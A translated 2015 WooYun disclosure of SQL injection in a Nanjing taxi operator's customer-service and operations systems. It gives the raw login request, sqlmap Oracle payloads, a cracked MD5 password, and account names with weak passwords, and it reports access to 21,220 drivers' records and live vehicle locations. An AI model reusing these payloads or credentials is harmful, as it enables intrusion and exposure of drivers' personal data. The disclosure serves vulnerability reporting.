
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0147292

Title: Taxi industry, part two: how I monitored more than 10,000 taxis in one city in real time (personal information of over 20,000 drivers leaked)

Vendor: 天泽信息产业股份有限公司

Author: 洞主

Submitted: 2015-10-17 08:49

Fixed: 2015-12-05 15:10

Disclosed: 2015-12-05 15:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-17: details sent to the vendor, awaiting vendor handling
2015-10-21: vendor confirmed; details visible to the vendor only
2015-10-31: details disclosed to core white hats and domain experts
2015-11-10: details disclosed to regular white hats
2015-11-20: details disclosed to intern white hats
2015-12-05: details disclosed to the public

Brief description:

Honestly, this one gave me a real headache. The reason is that this SQL server hosts two applications: a taxi customer-service system and a taxi smart-operations system. For the first system I quickly obtained a back-end username and password; the second took a long time. From the system's URL path I guessed that the database name was one of MIS, MISTZ or SZTZMIS, but the user tables dumped from those three databases contained no admin user (I got stuck on this for a while, because the login attempts indicated that an admin user exists). Later I found out I had it wrong altogether. See the detailed description for the specifics.

Detailed description:

My target URL is http://**.**.**.**/taxi4mis/Area/nanjing/QyzxPage.aspx

1.jpg


Trying to log in as admin with an arbitrary password gives a "wrong password" message:

2.jpg


From this I concluded that the admin user exists. Since there is no lockout on failed attempts and no CAPTCHA, I tried brute-forcing it with Burp Suite, without success.
Starting from the customer-service system instead, I found an SQL injection.
The HTTP request is:

POST /CMS/Logon.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://**.**.**.**/CMS/Logon.aspx
Content-Length: 216
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: token=1844069a-3d9d-4e3c-9952-932ff5db652e; ASP.NET_SessionId=b5bwlpz0yq5xlz55bbpwgw55
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnLogin=%a6%cc%3f%3f%3f&txtLogon=1&txtPassword=g00dPa%24%24w0rD&__EVENTVALIDATION=/wEWBAKiu4CwCQLk%2b/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6/UqUU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k%3d


The txtLogon parameter is injectable.
Running it through sqlmap gives:

C:\Python27\sqlmap1.0\sqlmap>sqlmap.py -r d:\7.txt --current-user --is-dba
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150915}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 21:47:54
d:\7.txt
[21:47:54] [INFO] parsing HTTP request from 'd:\7.txt'
d:\7.txt
[21:47:54] [INFO] resuming back-end DBMS 'oracle'
[21:47:54] [INFO] testing connection to the target URL
[21:47:54] [INFO] heuristically checking if the target is protected by some kind
of WAF/IPS/IDS
[21:47:54] [INFO] it appears that the target is not protected
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: txtLogon (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: btnLogin=%a6%cc???&txtLogon=1') AND 3967=(SELECT UPPER(XMLType(CHR(
60)||CHR(58)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WH
EN (3967=3967) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(
107)||CHR(113)||CHR(62))) FROM DUAL) AND ('ebie'='ebie&txtPassword=g00dPa$$w0rD&
__EVENTVALIDATION=/wEWBAKiu4CwCQLk+/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6/Uq
UU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: btnLogin=%a6%cc???&txtLogon=1') AND 2523=DBMS_PIPE.RECEIVE_MESSAGE(
CHR(99)||CHR(113)||CHR(89)||CHR(118),5) AND ('nJhK'='nJhK&txtPassword=g00dPa$$w0
rD&__EVENTVALIDATION=/wEWBAKiu4CwCQLk+/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6
/UqUU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k=
---
[21:47:54] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[21:47:54] [INFO] fetching current user
[21:47:54] [INFO] resumed: CMS
current user: 'CMS'
[21:47:54] [INFO] testing if current user is DBA
current user is DBA: True
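
As an added illustration (not part of the original report), the following Python snippet shows how a defender could flag request bodies carrying the two Oracle injection shapes sqlmap identified above (XMLType error-based and DBMS_PIPE time-based). The sample bodies and the signature names are constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Signatures for the two Oracle injection techniques sqlmap reported against
# txtLogon: error-based via XMLType() with CHR() concatenation, and time-based
# via DBMS_PIPE.RECEIVE_MESSAGE. The breakout pattern covers the "1') AND" prefix.
SIGNATURES = {
    "oracle_error_based_xmltype": re.compile(r"XMLType\s*\(", re.I),
    "oracle_time_based_dbms_pipe": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I),
    "chr_concat_chain": re.compile(r"(?:CHR\(\d+\)\s*\|\|\s*){3,}", re.I),
    "quote_paren_breakout": re.compile(r"'\)\s+(?:AND|OR)\s+", re.I),
}

def inspect_body(body, watched=("txtLogon", "txtPassword")):
    """Decode a form-encoded POST body and return {param: [signature names]}
    for every watched field whose decoded value trips at least one signature."""
    hits = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        if param not in watched:
            continue
        for value in values:  # parse_qs already percent-decodes each value
            matched = [name for name, rx in SIGNATURES.items() if rx.search(value)]
            if matched:
                hits.setdefault(param, []).extend(matched)
    return hits

# Constructed sample bodies: one benign login and two shaped like the payloads
# in the sqlmap output above (VIEWSTATE/EVENTVALIDATION omitted for brevity).
SAMPLE_BODIES = {
    "benign": "btnLogin=Login&txtLogon=alice&txtPassword=s3cret",
    "error_based": (
        "btnLogin=Login&txtLogon=1') AND 3967=(SELECT UPPER(XMLType(CHR(60)||CHR(58)"
        "||CHR(113)||(SELECT (CASE WHEN (3967=3967) THEN 1 ELSE 0 END) FROM DUAL)"
        "||CHR(62))) FROM DUAL) AND ('ebie'='ebie&txtPassword=x"
    ),
    "time_based": (
        "btnLogin=Login&txtLogon=1') AND 2523=DBMS_PIPE.RECEIVE_MESSAGE("
        "CHR(99)||CHR(113)||CHR(89)||CHR(118),5) AND ('nJhK'='nJhK&txtPassword=x"
    ),
}

def scan_all(bodies=SAMPLE_BODIES):
    """Return {label: hits} for every body; empty hits mean nothing matched."""
    return {label: inspect_body(body) for label, body in bodies.items()}

if __name__ == "__main__":
    for label, hits in scan_all().items():
        print(f"{label:12s} {hits or 'clean'}")
```

The same signatures can be applied to decoded IIS request logs, but a parameterised query on the server side remains the actual fix.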


The database user is CMS, with DBA privileges.
The databases present are:

dbs
available databases [19]:
[*] APPQOSSYS
[*] CMS
[*] DBSNMP
[*] EXFSYS
[*] MAPINFO
[*] MCC2
[*] MDSYS
[*] MIS
[*] MISTZ
[*] NJKG
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] SZTZMIS
[*] WMSYS
[*] XDB


Starting with the CMS database, its tables are as follows:

---
Parameter: txtLogon (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: btnLogin=%a6%cc???&txtLogon=1') AND 3967=(SELECT UPPER(XMLType(CHR(
60)||CHR(58)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WH
EN (3967=3967) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(
107)||CHR(113)||CHR(62))) FROM DUAL) AND ('ebie'='ebie&txtPassword=g00dPa$$w0rD&
__EVENTVALIDATION=/wEWBAKiu4CwCQLk+/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6/Uq
UU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: btnLogin=%a6%cc???&txtLogon=1') AND 2523=DBMS_PIPE.RECEIVE_MESSAGE(
CHR(99)||CHR(113)||CHR(89)||CHR(118),5) AND ('nJhK'='nJhK&txtPassword=g00dPa$$w0
rD&__EVENTVALIDATION=/wEWBAKiu4CwCQLk+/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6
/UqUU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k=
---
[21:50:16] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[21:50:16] [INFO] fetching tables for database: 'CMS'
[21:50:16] [INFO] the SQL query used returns 82 entries
Database: CMS
[82 tables]
+-----------------------------+
| ABUG |
| BUGCAR |
| CMS_APP_CODE |
| CMS_CALLBLACK |
| CMS_CALLBLACK_LOG |
| CMS_CALLBLACK_TEMP |
| CMS_CUSTOM_APPEAL |
| CMS_CUSTOM_CAT |
| CMS_CUSTOM_MAP |
| CMS_CUSTOM_VISIT |
| CMS_DISPATCH_ADDRESS |
| CMS_DISPATCH_MEMBER |
| CMS_DISPATCH_MEMBERLOGS |
| CMS_DISPATCH_OPERLOGS |
| CMS_DISPATCH_VBLACK |
| CMS_DISPATCH_VBLACK_LOG |
| CMS_DISPATCH_VIP |
| CMS_ERCODE |
| CMS_EXRST_DANGER_LQ |
| CMS_EXRST_EXT |
| CMS_EXRST_LQ |
| CMS_EXRST_LT |
| CMS_EXRST_YX |
| CMS_EXRST_YX_TMP |
| CMS_EXTMP_DANGER_LQ |
| CMS_EXTMP_LQ |
| CMS_EXTMP_LT |
| CMS_EXTMP_YX |
| CMS_EXTMP_YXFIX |
| CMS_EXTMP_YX_OLD |
| CMS_GJDATA_COMPANY |
| CMS_GJDATA_VEHICLE |
| CMS_LQDATA_COMPANY |
| CMS_LQDATA_VEHICLE |
| CMS_LQDATA_VEHICLEDRIVER |
| CMS_ODOMETER_STAT |
| CMS_ODOMETER_TRACK |
| CMS_ODOMETER_VEHICLE |
| CMS_PROCESS_LOG |
| CMS_REPAIR_BILL |
| CMS_REPAIR_BILLDETAIL |
| CMS_REPAIR_BILLOLD |
| CMS_REPAIR_COMP |
| CMS_REPAIR_RENT |
| CMS_TEMP_LIST |
| CMS_USER_DEPT |
| CMS_USER_STAFF |
| CMS_USER_WORKORDER |
| CMS_USER_WORKORDERDETAIL |
| CMS_VEHICLE_BLACK |
| CMS_VEHICLE_DREXAUTH |
| CMS_VEHICLE_DRIVER |
| CMS_VEHICLE_EXCODE |
| CMS_VEHICLE_FEE |
| CMS_VEHICLE_FEELOG |
| CMS_VEHICLE_FEEVERIFY |
| CMS_VEHICLE_FEEVERIFY_ITEM |
| CMS_VEHICLE_FEE_BAK |
| CMS_VEHICLE_HISTORY |
| CMS_VEHICLE_STATE |
| CMS_VSTATE_LOGS |
| CMS_WORK_SETUP |
| CMS_WORK_USER |
| CMS_YXDATA_COMPANY |
| CMS_YXDATA_PICKLOAD |
| CMS_YXDATA_VEHICLE |
| CMS_YXDATA_VEHICLE_DETAIL |
| CMS_YXDATA_VEHICLE_DRIVER |
| CMS_YXDATA_VEHICLE_EXT |
| CMS_YXDATA_VEHICLE_GROUP |
| CMS_YXDATA_VEHICLE_TEARDOWN |
| CREATE$JAVA$LOB$TABLE |
| JAVA$OPTIONS |
| MIS_SYS_AUTH |
| MIS_SYS_GROUP |
| MIS_SYS_GROUPCOM |
| MIS_SYS_LOG |
| MIS_SYS_MODULE |
| MIS_SYS_ROLE |
| MIS_SYS_SUBAUTH |
| MIS_SYS_SUBSYSTEM |
| MIS_SYS_USER |
+-----------------------------+


I guessed that the usernames and passwords are in MIS_SYS_USER.
Running sqlmap gave the following result:

Database: CMS
Table: MIS_SYS_USER
[73 entries]
+-------------+-------------+----------------------------------+
| LOGON | USERNAME | PASSWORD |
+-------------+-------------+----------------------------------+
+-------------+-------------+----------------------------------+


Taking the last account, qiuj, as an example, reversing its MD5 hash gives the password 810712.
Trying to log in to the customer-service system: http://**.**.**.**/CMS/Logon.aspx
Login succeeded:

3.jpg


OK, that is it for this one; now on to the other system.
http://**.**.**.**/taxi4mis/Area/nanjing/QyzxPage.aspx
Something came up, so I will get straight to the point: the target is in Database: SZTZMIS, Table: APP_STAFF.
Running sqlmap directly gives:

Database: SZTZMIS
Table: APP_STAFF
[138 entries]
+--------------+----------------------------------+------------+
| LOGIN | USERPWD | STAFFNAME |
+--------------+----------------------------------+------------+
+--------------+----------------------------------+------------+


Taking the account njgjfjkk (Nanjing public-transport sub-bureau checkpoint brigade) as an example, reversing 29035CB84ABC6E8636E44F83300D1C9C gives the password gjfjza.

4.jpg


Login succeeded (several other accounts can also log in:
zb2 123456
hongyun 123456
jiangnan 123456
QAZYC 123456)
I did not try the others one by one.
After logging in as njgjfjkk, the personal information of all 21,220 drivers in the city can be viewed (name, mobile number, ID card number, fleet, education, etc.).

7.jpg

6.jpg

5.jpg


The current position of every vehicle can be monitored:

8.jpg


Proof of vulnerability:

Proven above. Where I forgot to mask something, would the reviewers please add a mosaic, thanks!

Remediation:

1. Parameter filtering
2. Fix the weak passwords
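
The second remediation point, and the two credential dumps above, call for an audit of the stored hashes. This added Python example (not from the report or the vendor) flags NULL hashes, hashes of common defaults such as 123456, and one hash shared across many accounts; the rows and login names are constructed, not taken from the dumps.

```python
import hashlib
from collections import Counter

# Small wordlist of defaults; 123456 is the password behind the hash that
# dominates both dumps on this page, and 123 appears there as well.
COMMON_PASSWORDS = ["123456", "123", "password", "admin", "111111", "123123"]

def md5_hex(text):
    """Unsalted uppercase MD5, matching the storage format in the dumps."""
    return hashlib.md5(text.encode("utf-8")).hexdigest().upper()

LOOKUP = {md5_hex(p): p for p in COMMON_PASSWORDS}

def audit_accounts(rows, share_threshold=3):
    """rows: list of (login, md5_hex_or_None). Returns a list of
    (login, reason, detail) findings: empty hashes, wordlist hits, and hashes
    shared by >= share_threshold accounts (a sign of a common default even
    when the plaintext is not in the wordlist)."""
    counts = Counter(h.upper() for _, h in rows if h)
    findings = []
    for login, h in rows:
        if not h:
            findings.append((login, "empty_hash", None))
        elif h.upper() in LOOKUP:
            findings.append((login, "common_password", LOOKUP[h.upper()]))
        elif counts[h.upper()] >= share_threshold:
            findings.append((login, "shared_hash", h.upper()))
    return findings

def summarize(findings):
    """Count findings per reason, e.g. {'common_password': 4, ...}."""
    return dict(Counter(reason for _, reason, _ in findings))

# Constructed sample rows (fictitious logins) in the shape of APP_STAFF:
# LOGIN, USERPWD. Three carry md5("123456"), one md5("123"), three share an
# unrelated constructed hash, one is NULL, and one is unique.
SHARED = "7A1B2C3D4E5F60718293A4B5C6D7E8F9"  # constructed, not a known password
SAMPLE_ROWS = [
    ("fleet_a", "E10ADC3949BA59ABBE56E057F20F883E"),
    ("fleet_b", "e10adc3949ba59abbe56e057f20f883e"),
    ("fleet_c", md5_hex("123456")),
    ("dev_1", "202CB962AC59075B964B07152D234B70"),
    ("ops_1", SHARED), ("ops_2", SHARED), ("ops_3", SHARED),
    ("dispatch_1", None),
    ("admin_x", md5_hex("correct horse battery staple")),
]

if __name__ == "__main__":
    for finding in audit_accounts(SAMPLE_ROWS):
        print(finding)
    print(summarize(audit_accounts(SAMPLE_ROWS)))
```

Flagged accounts should be forced to reset, and the store should move from unsalted MD5 to a salted, slow hash such as bcrypt or PBKDF2.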

Copyright notice: when reposting, please credit 洞主@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-21 15:08

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Jiangsu branch center, which will coordinate handling with the website's administering organisation.

Latest status:

None yet


Vulnerability assessment:

Comments

  1. 2015-10-17 09:11 | 洞主 ( intern white hat | Rank:55 vulnerabilities:10 | likes long legs)

    Part three is in preparation